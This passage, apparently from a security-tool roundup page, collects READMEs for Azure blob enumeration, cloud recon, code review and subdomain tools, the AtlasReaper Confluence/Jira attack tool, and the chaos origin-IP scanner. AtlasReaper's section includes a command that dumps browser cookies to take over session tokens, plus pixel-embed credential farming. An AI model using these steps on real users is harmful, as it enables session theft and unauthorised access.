    Goblob comes bundled with basic wordlists that can be used with the -containers option:

    Optional Flags

    Goblob provides several flags that can be tuned in order to improve the enumeration process:

    • -goroutines=N - Maximum number of concurrent goroutines to allow (default: 5000).
    • -blobs=true - Report the URL of each blob instead of the URL of the containers (default: false).
    • -verbose=N - Set verbosity level (default: 1, min: 0, max: 3).
    • -maxpages=N - Maximum of container pages to traverse looking for blobs (default: 20, set to -1 to disable limit or to 0 to avoid listing blobs at all and just check if the container is public)
    • -timeout=N - Timeout for HTTP requests (seconds, default: 90)
    • -maxidleconns=N - MaxIdleConns transport parameter for HTTP client (default: 100)
    • -maxidleconnsperhost=N - MaxIdleConnsPerHost transport parameter for HTTP client (default: 10)
    • -maxconnsperhost=N - MaxConnsPerHost transport parameter for HTTP client (default: 0)
    • -skipssl=true - Skip SSL verification (default: false)
    • -invertsearch=true - Enumerate accounts for each container instead of containers for each account (default: false)

    For instance, if you just want to find publicly exposed containers using large lists of storage accounts and container names, you should use -maxpages=0 to prevent the goroutines from paginating the results. Then run it again on the set of results you found with -blobs=true and -maxpages=-1 to actually get the URLs of the blobs.

    If, on the other hand, you want to test a small list of very popular container names against a large set of storage accounts, you might want to try -invertsearch=true with -maxpages=0, in order to see the public accounts for each container name instead of the container names for each storage account.

    You may also want to try changing -goroutines, -timeout and -maxidleconns, -maxidleconnsperhost and -maxconnsperhost and -skipssl in order to best use your bandwidth and find results faster.

    Experiment with the flags to find what works best for you ;-)

    Example

    A fast enumeration tool for publicly exposed Azure Storage blobs. (6)

    Contributing

    Contributions are welcome by opening an issue or by submitting a pull request.

    TODO

    • Check blob domain for NXDOMAIN before trying wordlist to save bandwidth (maybe)
    • Improve default parameters for better performance

    Wordcloud

    An interesting visualization of popular container names found in my experiments with the tool:


    If you want to know more about my experiments and the subject in general, take a look at my article:



    CloudPulse - AWS Cloud Landscape Search Engine

    By: Zion3R


    During the reconnaissance phase, an attacker searches for any information about his target to create a profile that will later help him to identify possible ways to get in an organization.
    CloudPulse is a powerful tool that simplifies and enhances the analysis of SSL certificate data. It leverages the extensive repository of SSL certificates obtained from the AWS EC2 machines available at Trickest Cloud. With CloudPulse , security researchers can efficiently explore SSL certificate details, uncover potential vulnerabilities, and gather valuable insights for a variety of security-related tasks.


    Simplifies security assessments with a user-friendly interface. It allows you to effortlessly find company's asset's on aws cloud:

    • IPs
    • subdomains
    • domains associated with a target
    • organization name
    • discover origin ips

    1- Download CloudPulse :

    git clone https://github.com/yousseflahouifi/CloudPulse
    cd CloudPulse/

    2- Run docker compose :

    docker-compose up -d

    3- Run script.py script

    docker-compose exec web python script.py

    4 - Now go to http://:8000/search and enjoy the search engine

    1- download CloudPulse :

    git clone https://github.com/yousseflahouifi/CloudPulse
    cd CloudPulse/

    2- Setup virtual environment :

    python3 -m venv myenv
    source myenv/bin/activate

    3- Install requirements.txt file :

    pip install -r requirements.txt

    4- run an instance of elasticsearch using docker :

    docker run -d --name elasticsearch -p 9200:9200 -e "discovery.type=single-node" elasticsearch:6.6.1

    5- update script.py and settings file to the host 'localhost':

    #script.py
    es = Elasticsearch([{'host': 'localhost', 'port': 9200}])
    #se/settings.py

    ELASTICSEARCH_DSL = {
    'default': {
    'hosts': 'localhost:9200'
    },
    }

    6- Run script.py to index data in elasticsearch:

    python script.py

    7- Run the app:

    python manage.py runserver 0:8000

    Included in the CloudPulse repository is a sample data.csv file containing close to 4,000 records, which provides a glimpse of the tool's capabilities. For the full dataset, visit the Trickest Cloud repository clone the data and update data.csv file (it contains close to 9 millions data)

    as an example searching for .mil data gives:

    searching for tesla as en example gives :

    CloudPulse heavily depends on the data.csv file, which is a sample dataset extracted from the larger collection maintained by Trickest. While the sample dataset provides valuable insights, the tool's full potential is realized when used in conjunction with the complete dataset, which is accessible in the Trickest repository here.
    Users are encouraged to refer to the Trickest dataset for a more comprehensive and up-to-date analysis.



    DakshSCRA - Source Code Review Assist

    By: Zion3R


    Daksh SCRA (Source Code Review Assist) tool is built to enhance the efficiency of the source code review process, providing a well-structured and organized approach for code reviewers.

    Rather than indiscriminately flagging everything as a potential issue, Daksh SCRA promotes thoughtful analysis, urging the investigation and confirmation of potential problems. This approach mitigates the scramble to tag every potential concern as a bug, cutting back on the confusion and wasted time spent on false positives.

    What sets Daksh SCRA apart is its emphasis on avoiding unnecessary bug tagging. Unlike conventional methods, it advocates for thorough investigation and confirmation of potential issues before tagging them as bugs. This approach helps mitigate the issue of false positives, which often consume valuable time and resources, thereby fostering a more productive and efficient code review process.


    Debut

    Daksh SCRA was initially introduced during a source code review training session I conducted at Black Hat USA 2022 (August 6 - 9), where it was subtly presented to a specific audience. However, this introduction was carried out with a low-profile approach, avoiding any major announcements.

    While this tool was quietly published on GitHub after the 2022 training, its official public debut took place at Black Hat USA 2023 in Las Vegas.

    Features and Functionalities

    Distinctive Features (Multiple World’s First)

    • Identifies Areas of Interest in Source Code: Encourage focused investigation and confirmation rather than indiscriminately labeling everything as a bug.

    • Identifies Areas of Interest in File Paths (World’s First): Recognises patterns in file paths to pinpoint relevant sections for review.

    • Software-Level Reconnaissance to Identify Technologies Utilised: Identifies project technologies, enabling code reviewers to conduct precise scans with appropriate rules.

    • Automated Scientific Effort Estimation for Code Review (World’s First): Providing a measurable approach for estimating efforts required for a code review process.

    Although this tool has progressed beyond its early stages, it has reached a functional state that is quite usable and delivers on its promised capabilities. Nevertheless, active enhancements are currently underway, and there are multiple new features and improvements expected to be added in the upcoming months.

    Additionally, the tool offers the following functionalities:

    • Options to use platform-specific rules specific for finding areas of interests
    • Options to extend or add new rules for any new or existing languages
    • Generates report in text, HTML and PDF format for inspection

    Refer to the wiki for the tool setup and usage details - https://github.com/coffeeandsecurity/DakshSCRA/wiki

    Feel free to contribute towards updating or adding new rules and future development.

    If you find any bugs, report them to d3basis.m0hanty@gmail.com.

    Tool Setup

    Pre-requisites

    Python3 and all the libraries listed in requirements.txt

    Setting up environment to run this tool

    1. Setup a virtual environment

    $ pip install virtualenv

    $ virtualenv -p python3 {name-of-virtual-env} // Create a virtualenv
    Example: virtualenv -p python3 venv

    $ source {name-of-virtual-env}/bin/activate // To activate virtual environment you just created
    Example: source venv/bin/activate

    After running the activate command you should see the name of your virtual env at the beginning of your terminal like this: (venv) $

    2. Ensure all required libraries are installed within the virtual environment

    You must run the below command after activating the virtual environment as mentioned in the previous steps.

    pip install -r requirements.txt

    Once the above step successfully installs all the required libraries, refer to the following tool usage commands to run the tool.

    Tool Usage

    $ python3 dakshscra.py -h // To view avaialble options and arguments

    usage: dakshscra.py [-h] [-r RULE_FILE] [-f FILE_TYPES] [-v] [-t TARGET_DIR] [-l {R,RF}] [-recon] [-estimate]

    options:
    -h, --help show this help message and exit
    -r RULE_FILE Specify platform specific rule name
    -f FILE_TYPES Specify file types to scan
    -v Specify verbosity level {'-v', '-vv', '-vvv'}
    -t TARGET_DIR Specify target directory path
    -l {R,RF}, --list {R,RF}
    List rules [R] OR rules and filetypes [RF]
    -recon Detects platform, framework and programming language used
    -estimate Estimate efforts required for code review

    Example Usage

    $ python3 dakshscra.py // To view tool usage along with examples

    Examples:
    # '-f' is optional. If not specified, it will default to the corresponding filetypes of the selected rule.
    dakshsca.py -r php -t /source_dir_path

    # To override default settings, other filetypes can be specified with '-f' option.
    dakshsca.py -r php -f dotnet -t /path_to_source_dir
    dakshsca.py -r php -f custom -t /path_to_source_dir

    # Perform reconnaissance and rule based scanning if '-recon' used with '-r' option.
    dakshsca.py -recon -r php -t /path_to_source_dir

    # Perform only reconnaissance if '-recon' used without the '-r' option.
    dakshsca.py -recon -t /path_to_source_dir

    # Verbosity: '-v' is default, '-vvv' will display all rules check within each rule category.
    dakshsca.py -r php -vv -t /path_to_source_dir


    Supported RULE_FILE: dotnet, java, php, javascript
    Supported FILE_TY PES: dotnet, php, java, custom, allfiles

    Reports

    The tool generates reports in three formats: HTML, PDF, and TEXT. Although the HTML and PDF reports are still being improved, they are currently in a reasonably good state. With each subsequent iteration, these reports will continue to be refined and improved even further.

    Scanning (Areas of Security Concerns) Report

    HTML Report:
    • DakshSCRA/reports/html/report.html
    PDF Report:
    • DakshSCRA/reports/html/report.pdf
    RAW TEXT Based Reports:
    • Areas of Interest - Identified Patterns : DakshSCRA/reports/text/areas_of_interest.txt
    • Areas of Interest - Project Files: DakshSCRA/reports/text/filepaths_aoi.txt
    • Identified Project Files: DakshSCRA/runtime/filepaths.txt

    Reconnaissance (Recon) Report

    • Reconnaissance Summary: /reports/text/recon.txt

    Note: Currently, the reconnaissance report is created in a text format. However, in upcoming releases, the plan is to incorporate it into the vulnerability scanning report, which will be available in both HTML and PDF formats.

    Code Review Effort Estimation Report

    • Effort estimation report: /reports/html/estimation.html

    Note: At present, the effort estimation for the source code review is in its early stages. It is considered experimental and will be developed and refined through several iterations. Improvements will be made over multiple releases, as the formula and the concept are new and require time to be honed to achieve accuracy or reasonable estimation.

    Currently, the report is generated in HTML format. However, in future releases, there are plans to also provide it in PDF format.



    AtlasReaper - A Command-Line Tool For Reconnaissance And Targeted Write Operations On Confluence And Jira Instances

    By: Zion3R

    Β 


    AtlasReaper is a command-line tool developed for offensive security purposes, primarily focused on reconnaissance of Confluence and Jira. It also provides various features that can be helpful for tasks such as credential farming and social engineering. The tool is written in C#.


    Blog post: Sowing Chaos and Reaping Rewards in Confluence and Jira

                                                       .@@@@
    @@@@@
    @@@@@ @@@@@@@
    @@@@@ @@@@@@@@@@@
    @@@@@ @@@@@@@@@@@@@@@
    @@@@, @@@@ *@@@@
    @@@@ @@@ @@ @@@ .@@@
    _ _ _ ___ @@@@@@@ @@@@@@
    /_\| |_| |__ _ __| _ \___ __ _ _ __ ___ _ _ @@ @@@@@@@@
    / _ \ _| / _` (_-< / -_) _` | '_ \/ -_) '_| @@ @@@@@@@@
    /_/ \_\__|_\__,_/__/_|_\___\__,_| .__/\___|_| @@@@@@@@ &@
    |_| @@@@@@@@@@ @@&
    @@@@@@@@@@@@@@@@@
    @@@@@@@@@@@@@@@@. @@
    @werdhaihai

    Usage

    AtlasReaper uses commands, subcommands, and options. The format for executing commands is as follows:

    .\AtlasReaper.exe [command] [subcommand] [options]

    Replace [command], [subcommand], and [options] with the appropriate values based on the action you want to perform. For more information about each command or subcommand, use the -h or --help option.

    Below is a list of available commands and subcommands:

    Commands

    Each command has sub commands for interacting with the specific product.

    • confluence
    • jira

    Subcommands

    Confluence

    • confluence attach - Attach a file to a page.
    • confluence download - Download an attachment.
    • confluence embed - Embed a 1x1 pixel image to perform farming attacks.
    • confluence link - Add a link to a page.
    • confluence listattachments - List attachments.
    • confluence listpages - List pages in Confluence.
    • confluence listspaces - List spaces in Confluence.
    • confluence search - Search Confluence.

    Jira

    • jira addcomment - Add a comment to an issue.
    • jira attach - Attach a file to an issue.
    • jira createissue - Create a new issue.
    • jira download - Download attachment(s) from an issue.
    • jira listattachments - List attachments on an issue.
    • jira listissues - List issues in Jira.
    • jira listprojects - List projects in Jira.
    • jira listusers - List Atlassian users.
    • jira searchissues - Search issues in Jira.

    Common Commands

    • help - Display more information on a specific command.

    Examples

    Here are a few examples of how to use AtlasReaper:

    • Search for a keyword in Confluence with wildcard search:

      .\AtlasReaper.exe confluence search --query "http*example.com*" --url $url --cookie $cookie

    • Attach a file to a page in Confluence:

      .\AtlasReaper.exe confluence attach --page-id "12345" --file "C:\path\to\file.exe" --url $url --cookie $cookie

    • Create a new issue in Jira:

      .\AtlasReaper.exe jira createissue --project "PROJ" --issue-type Task --message "I can't access this link from my host" --url $url --cookie $cookie

    Authentication

    Confluence and Jira can be configured to allow anonymous access. You can check this by supplying omitting the -c/--cookie from the commands.

    In the event authentication is required, you can dump cookies from a user's browser with SharpChrome or another similar tool.

    1. .\SharpChrome.exe cookies /showall

    2. Look for any cookies scoped to the *.atlassian.net named cloud.session.token or tenant.session.token

    Limitations

    Please note the following limitations of AtlasReaper:

    • The tool has not been thoroughly tested in all environments, so it's possible to encounter crashes or unexpected behavior. Efforts have been made to minimize these issues, but caution is advised.
    • AtlasReaper uses the cloud.session.token or tenant.session.token which can be obtained from a user's browser. Alternatively, it can use anonymous access if permitted. (API tokens or other auth is not currently supported)
    • For write operations, the username associated with the user session token (or "anonymous") will be listed.

    Contributing

    If you encounter any issues or have suggestions for improvements, please feel free to contribute by submitting a pull request or opening an issue in the AtlasReaper repo.



    Xsubfind3R - A CLI Utility To Find Domain'S Known Subdomains From Curated Passive Online Sources

    By: Zion3R


    xsubfind3r is a command-line interface (CLI) utility to find domain's known subdomains from curated passive online sources.


    Features

    • Fetches domains from curated passive sources to maximize results.

    • Supports stdin and stdout for easy integration into workflows.

    • Cross-Platform (Windows, Linux & macOS).

    Installation

    Install release binaries (Without Go Installed)

    Visit the releases page and find the appropriate archive for your operating system and architecture. Download the archive from your browser or copy its URL and retrieve it with wget or curl:

    • ...with wget:

       wget https://github.com/hueristiq/xsubfind3r/releases/download/v<version>/xsubfind3r-<version>-linux-amd64.tar.gz
    • ...or, with curl:

       curl -OL https://github.com/hueristiq/xsubfind3r/releases/download/v<version>/xsubfind3r-<version>-linux-amd64.tar.gz

    ...then, extract the binary:

    tar xf xsubfind3r-<version>-linux-amd64.tar.gz

    TIP: The above steps, download and extract, can be combined into a single step with this onliner

    curl -sL https://github.com/hueristiq/xsubfind3r/releases/download/v<version>/xsubfind3r-<version>-linux-amd64.tar.gz | tar -xzv

    NOTE: On Windows systems, you should be able to double-click the zip archive to extract the xsubfind3r executable.

    ...move the xsubfind3r binary to somewhere in your PATH. For example, on GNU/Linux and OS X systems:

    sudo mv xsubfind3r /usr/local/bin/

    NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xsubfind3r to their PATH.

    Install source (With Go Installed)

    Before you install from source, you need to make sure that Go is installed on your system. You can install Go by following the official instructions for your operating system. For this, we will assume that Go is already installed.

    go install ...

    go install -v github.com/hueristiq/xsubfind3r/cmd/xsubfind3r@latest

    go build ... the development Version

    • Clone the repository

       git clone https://github.com/hueristiq/xsubfind3r.git 
    • Build the utility

       cd xsubfind3r/cmd/xsubfind3r && \
      go build .
    • Move the xsubfind3r binary to somewhere in your PATH. For example, on GNU/Linux and OS X systems:

       sudo mv xsubfind3r /usr/local/bin/

      NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xsubfind3r to their PATH.

    NOTE: While the development version is a good way to take a peek at xsubfind3r's latest features before they get released, be aware that it may have bugs. Officially released versions will generally be more stable.

    Post Installation

    xsubfind3r will work right after installation. However, BeVigil, Chaos, Fullhunt, Github, Intelligence X and Shodan require API keys to work, URLScan supports API key but not required. The API keys are stored in the $HOME/.hueristiq/xsubfind3r/config.yaml file - created upon first run - and uses the YAML format. Multiple API keys can be specified for each of these source from which one of them will be used.

    Example config.yaml:

    version: 0.3.0
    sources:
    - alienvault
    - anubis
    - bevigil
    - chaos
    - commoncrawl
    - crtsh
    - fullhunt
    - github
    - hackertarget
    - intelx
    - shodan
    - urlscan
    - wayback
    keys:
    bevigil:
    - awA5nvpKU3N8ygkZ
    chaos:
    - d23a554bbc1aabb208c9acfbd2dd41ce7fc9db39asdsd54bbc1aabb208c9acfb
    fullhunt:
    - 0d9652ce-516c-4315-b589-9b241ee6dc24
    github:
    - d23a554bbc1aabb208c9acfbd2dd41ce7fc9db39
    - asdsd54bbc1aabb208c9acfbd2dd41ce7fc9db39
    intelx:
    - 2.intelx.io:00000000-0000-0000-0000-000000000000
    shodan:
    - AAAAClP1bJJSRMEYJazgwhJKrggRwKA
    urlscan:
    - d4c85d34-e425-446e-d4ab-f5a3412acbe8

    Usage

    To display help message for xsubfind3r use the -h flag:

    xsubfind3r -h

    help message:


    _ __ _ _ _____
    __ _____ _ _| |__ / _(_)_ __ __| |___ / _ __
    \ \/ / __| | | | '_ \| |_| | '_ \ / _` | |_ \| '__|
    > <\__ \ |_| | |_) | _| | | | | (_| |___) | |
    /_/\_\___/\__,_|_.__/|_| |_|_| |_|\__,_|____/|_| v0.3.0

    USAGE:
    xsubfind3r [OPTIONS]

    INPUT:
    -d, --domain string[] target domains
    -l, --list string target domains' list file path

    SOURCES:
    --sources bool list supported sources
    -u, --sources-to-use string[] comma(,) separeted sources to use
    -e, --sources-to-exclude string[] comma(,) separeted sources to exclude

    OPTIMIZATION:
    -t, --threads int number of threads (default: 50)

    OUTPUT:
    --no-color bool disable colored output
    -o, --output string output subdomains' file path
    -O, --output-directory string output subdomains' directory path
    -v, --verbosity string debug, info, warning, error, fatal or silent (default: info)

    CONFIGURATION:
    -c, --configuration string configuration file path (default: ~/.hueristiq/xsubfind3r/config.yaml)

    Contribution

    Issues and Pull Requests are welcome! Check out the contribution guidelines.

    Licensing

    This utility is distributed under the MIT license.



    Chaos - Origin IP Scanning Utility Developed With ChatGPT

    By: Zion3R


    chaos is an 'origin' IP scanner developed by RST in collaboration with ChatGPT. It is a niche utility with an intended audience of mostly penetration testers and bug hunters.

    An origin-IP is a term-of-art expression describing the final public IP destination for websites that are publicly served via 3rd parties. If you'd like to understand more about why anyone might be interested in Origin-IPs, please check out our blog post.

    chaos was rapidly prototyped from idea to functional proof-of-concept in less than 24 hours using our principles of DevOps with ChatGPT.

    usage: chaos.py [-h] -f FQDN -i IP [-a AGENT] [-C] [-D] [-j JITTER] [-o OUTPUT] [-p PORTS] [-P] [-r] [-s SLEEP] [-t TIMEOUT] [-T] [-v] [-x] 
    _..._
    .-'` `'-.
    __|___________|__
    \ /
    `._ CHAOS _.'
    `-------`
    / \\
    / \\
    / \\
    / \\
    / \\
    / \\
    / \\
    / \\
    / \\
    /_____________________\\
    CHAtgpt Origin-ip Scanner
    _______ _______ _______ _______ _______
    |\\ /|\\ /|\\ /|\\ /|\\/|
    | +---+ | +---+ | +---+ | +---+ | +---+ |
    | |H | | |U | | |M | | |A | | |N | |
    | |U | | |S | | |A | | |N | | |C | |
    | |M | | |E | | |N | | |D | | |O | |
    | |A | | |R | | |C | | | | | |L | |
    | +---+ | +---+ | +---+ | +---+ | +---+ |
    |/_____|\\_____|\\_____|\\_____|\\_____\\

    Origin IP Scanner developed with ChatGPT
    cha*os (n): complete disorder and confusion
    (ver: 0.9.4)


    Features

    • Threaded for performance gains
    • Real-time status updates and progress bars, nice for large scans ;)
    • Flexible user options for various scenarios & constraints
    • Dataset reduction for improved scan times
    • Easy to use CSV output

    Installation

    1. Download / clone / unzip / whatever
    2. cd path/to/chaos
    3. pip3 install -U pip setuptools virtualenv
    4. virtualenv env
    5. source env/bin/activate
    6. (env) pip3 install -U -r ./requirements.txt
    7. (env) ./chaos.py -h

    Options

    -h, --help            show this help message and exit
    -f FQDN, --fqdn FQDN Path to FQDN file (one FQDN per line)
    -i IP, --ip IP IP address(es) for HTTP requests (Comma-separated IPs, IP networks, and/or files with IP/network per line)
    -a AGENT, --agent AGENT
    User-Agent header value for requests
    -C, --csv Append CSV output to OUTPUT_FILE.csv
    -D, --dns Perform fwd/rev DNS lookups on FQDN/IP values prior to request; no impact to testing queue
    -j JITTER, --jitter JITTER
    Add a 0-N second randomized delay to the sleep value
    -o OUTPUT, --output OUTPUT
    Append console output to FILE
    -p PORTS, --ports PORTS
    Comma-separated list of TCP ports to use (default: "80,443")
    -P, --no-prep Do not pre-scan each IP/port w ith `GET /` using `Host: {IP:Port}` header to eliminate unresponsive hosts
    -r, --randomize Randomize(ish) the order IPs/ports are tested
    -s SLEEP, --sleep SLEEP
    Add N seconds before thread completes
    -t TIMEOUT, --timeout TIMEOUT
    Wait N seconds for an unresponsive host
    -T, --test Test-mode; don't send requests
    -v, --verbose Enable verbose output
    -x, --singlethread Single threaded execution; for 1-2 core systems; default threads=(cores-1) if cores>2

    Examples

    Localhost Testing

    Launch python HTTP server

    % python3 -u -m http.server 8001
    Serving HTTP on :: port 8001 (http://[::]:8001/) ...

    Launch ncat as HTTP on a port detected as SSL; use a loop because --keep-open can hang

    % while true; do ncat -lvp 8443 -c 'printf "HTTP/1.0 204 Plaintext OK\n\n<html></html>\n"'; done
    Ncat: Version 7.94 ( https://nmap.org/ncat )
    Ncat: Listening on [::]:8443
    Ncat: Listening on 0.0.0.0:8443

    Also launch ncat as SSL on a port that will default to HTTP detection

    % while true; do ncat --ssl -lvp 8444 -c 'printf "HTTP/1.0 202 OK\n\n<html></html>\n"'; done    
    Ncat: Version 7.94 ( https://nmap.org/ncat )
    Ncat: Generating a temporary 2048-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
    Ncat: SHA-1 fingerprint: 0208 1991 FA0D 65F0 608A 9DAB A793 78CB A6EC 27B8
    Ncat: Listening on [::]:8444
    Ncat: Listening on 0.0.0.0:8444

    Prepare an FQDN file:

    % cat ../test_localhost_fqdn.txt 
    www.example.com
    localhost.example.com
    localhost.local
    localhost
    notreally.arealdomain

    Prepare an IP file / list:

    % cat ../test_localhost_ips.txt 
    127.0.0.1
    127.0.0.0/29
    not_an_ip_addr
    -6.a
    =4.2
    ::1

    Run the scan

    • Note an IPv6 network added to IPs on the CLI
    • -p to specify the ports we are listening on
    • -x for single threaded run to give our ncat servers time to restart
    • -s0.2 short sleep for our ncat servers to restart
    • -t1 to timeout after 1 second
    % ./chaos.py -f ../test_localhost_fqdn.txt -i ../test_localhost_ips.txt,::1/126 -p 8001,8443,8444 -x -s0.2 -t1   
    2023-06-21 12:48:33 [WARN] Ignoring invalid FQDN value: localhost.local
    2023-06-21 12:48:33 [WARN] Ignoring invalid FQDN value: localhost
    2023-06-21 12:48:33 [WARN] Ignoring invalid FQDN value: notreally.arealdomain
    2023-06-21 12:48:33 [WARN] Error: invalid IP address or CIDR block =4.2
    2023-06-21 12:48:33 [WARN] Error: invalid IP address or CIDR block -6.a
    2023-06-21 12:48:33 [WARN] Error: invalid IP address or CIDR block not_an_ip_addr
    2023-06-21 12:48:33 [INFO] * ---- <META> ---- *
    2023-06-21 12:48:33 [INFO] * Version: 0.9.4
    2023-06-21 12:48:33 [INFO] * FQDN file: ../test_localhost_fqdn.txt
    2023-06-21 12:48:33 [INFO] * FQDNs loaded: ['www.example.com', 'localhost.example.com']
    2023-06-21 12:48:33 [INFO] * IP input value(s): ../test_localhost_ips.txt,::1/126
    2023-06-21 12:48:33 [INFO] * Addresses pars ed from IP inputs: 12
    2023-06-21 12:48:33 [INFO] * Port(s): 8001,8443,8444
    2023-06-21 12:48:33 [INFO] * Thread(s): 1
    2023-06-21 12:48:33 [INFO] * Sleep value: 0.2
    2023-06-21 12:48:33 [INFO] * Timeout: 1.0
    2023-06-21 12:48:33 [INFO] * User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36 ch4*0s/0.9.4
    2023-06-21 12:48:33 [INFO] * ---- </META> ---- *
    2023-06-21 12:48:33 [INFO] 36 unique address/port addresses for testing
    Prep Tests: 100%|β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ&# 9608;β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ| 36/36 [00:29<00:00, 1.20it/s]
    2023-06-21 12:49:03 [INFO] 9 IP/ports verified, reducing test dataset from 72 entries
    2023-06-21 12:49:03 [INFO] 18 pending tests remain after pre-testing
    2023-06-21 12:49:03 [INFO] Queuing 18 threads
    ++RCVD++ (200 OK) www.example.com @ :::8001
    ++RCVD++ (204 Plaintext OK) www.example.com @ :::8443
    ++RCVD++ (202 OK) www.example.com @ :::8444
    ++RCVD++ (200 OK) www.example.com @ ::1:8001
    ++RCVD++ (204 Plaintext OK) www.example.com @ ::1:8443
    ++RCVD++ (202 OK) www.example.com @ ::1:8444
    ++RCVD++ (200 OK) www.example.com @ 127.0.0.1:8001
    ++RCVD++ (204 Plaintext OK) www.example.com @ 127.0.0.1:8443
    ++RCVD++ (202 OK) www.example.com @ 127.0.0.1:8444
    ++RCVD++ (200 OK) localhost.example.com @ :::8001
    ++RCVD++ (204 Plaintext OK) localhost.example.com @ :::8443
    ++RCVD+ + (202 OK) localhost.example.com @ :::8444
    ++RCVD++ (200 OK) localhost.example.com @ ::1:8001
    ++RCVD++ (204 Plaintext OK) localhost.example.com @ ::1:8443
    ++RCVD++ (202 OK) localhost.example.com @ ::1:8444
    ++RCVD++ (200 OK) localhost.example.com @ 127.0.0.1:8001
    ++RCVD++ (204 Plaintext OK) localhost.example.com @ 127.0.0.1:8443
    ++RCVD++ (202 OK) localhost.example.com @ 127.0.0.1:8444
    Origin Scan: 100%|β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ&#96 08;β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ| 18/18 [00:06<00:00, 2.76it/s]
    2023-06-21 12:49:09 [RSLT] Results from 5 FQDNs:
    ::1
    ::1:8444 => (202 / OK)
    ::1:8443 => (204 / Plaintext OK)
    ::1:8001 => (200 / OK)

    127.0.0.1
    127.0.0.1:8001 => (200 / OK)
    127.0.0.1:8443 => (204 / Plaintext OK)
    127.0.0.1:8444 => (202 / OK)

    ::
    :::8001 => (200 / OK)
    :::8443 => (204 / Plaintext OK)
    :::8444 => (202 / OK)

    www.example.com
    :::8001 => (200 / OK)
    :::8443 => (204 / Plaintext OK)
    :::8444 => (202 / OK)
    ::1:8001 => (200 / OK)
    ::1:8443 => (204 / Plaintext OK)
    ::1:8444 => (202 / OK)
    127.0.0.1:8001 => (200 / OK)
    127.0.0.1:8443 => (204 / Plaintext OK)
    127.0.0.1:8444 => (202 / OK)

    localhost.example.com
    :::8001 => (200 / OK)
    :::8443 => (204 / Plaintext OK)
    :::8444 => (202 / OK)
    ::1:8001 => (200 / OK)
    ::1:8443 => (204 / Plaintext OK)
    ::1:8444 => (202 / OK)
    127.0.0.1:8001 => (200 / OK)
    127.0.0.1:8443 => (204 / Plaintext OK)
    127.0.0.1:8444 => (202 / OK)


    rst@r57 chaos %

    Test & Verbose localhost

    -T runs in test mode (do everything except send requests)

    -v verbose option provides additional output


    Known Defects

    • HTTP/HTTPS detection is not ideal
    • Need option to adjust CSV newline delimiter
    • Need options to adjust where long strings / many lines are truncated
    • Try to figure out why we marked requests v2.x as required ;)
    • Options for very-verbose / quiet
    • Stagger thread launch when we're using sleep / jitter
    • Search for meta-refresh in 200 responses
    • Content-Location header for 201s ?
    • Improve thread name generation so we have the right number of unique names
    • Sanity check on IPv6 netmasks to prevent scans that outlive the sun?
    • TBD?

    Related Links

    Disclaimers

    • Copyright (C) 2023 RST
    • This software is distributed on an "AS IS" basis, without express or implied warranties of any kind
    • This software is intended for research and/or authorized testing; it is your responsibility to ensure you are authorized to use this software in any way
